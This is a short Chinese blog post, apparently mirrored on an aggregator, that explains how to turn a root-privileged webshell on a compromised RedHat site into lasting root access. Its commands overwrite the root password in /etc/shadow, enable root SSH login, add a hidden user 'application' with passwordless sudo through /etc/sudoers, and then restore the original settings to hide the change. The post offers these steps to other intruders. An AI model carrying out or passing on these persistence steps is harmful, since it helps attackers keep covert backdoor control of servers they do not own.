zoukankan      html  css  js  c++  java
  • LINUX提权笔记

    没啥技术含量,一种思路,让某些得到root权限webshell的童鞋可以快点拿到权限。

    某日拿到某站webshell,RedHat 系统,Tomcat程序是root身份启动的,webshell当然也拥有root权限。

    1.webshell直接替换root密码: /etc/shadow    // 记得备份

    2.允许root通过ssh登陆: /etc/ssh/sshd_config

    PermitRootLogin yes #允许root登陆

    3.重启ssh服务 service ssh restart

    4.以root身份登陆ssh,增加一个用户

    useradd application

    passwd // 根据提示设置密码

    5.更改application用户运行su不需密码

    chmod +w /etc/sudoers // 增加写入权限,默认只读

    修改/etc/sudoers

    vi /etc/sudoers

    加入application ALL=(ALL) NOPASSWD: ALL

    6.把root密码修改回原样,禁止root登陆。并去除sudoers的写属性(chmod -w /etc/sudoers)。完工

    最后,上图

    root用户登陆:

    普通用户登陆,su免密码进入root权限

     

  • 相关阅读:
    HTML5 h1多层次样式问题
    spellcheck
    Favicon
    设计模式
    CSS 宽高的计算
    行高计算
    White-space 属性
    简约插件Plug-in for simple
    js类型及其判断
    前端路由
  • 原文地址:https://www.cnblogs.com/milantgh/p/3625301.html
Copyright © 2011-2022 走看看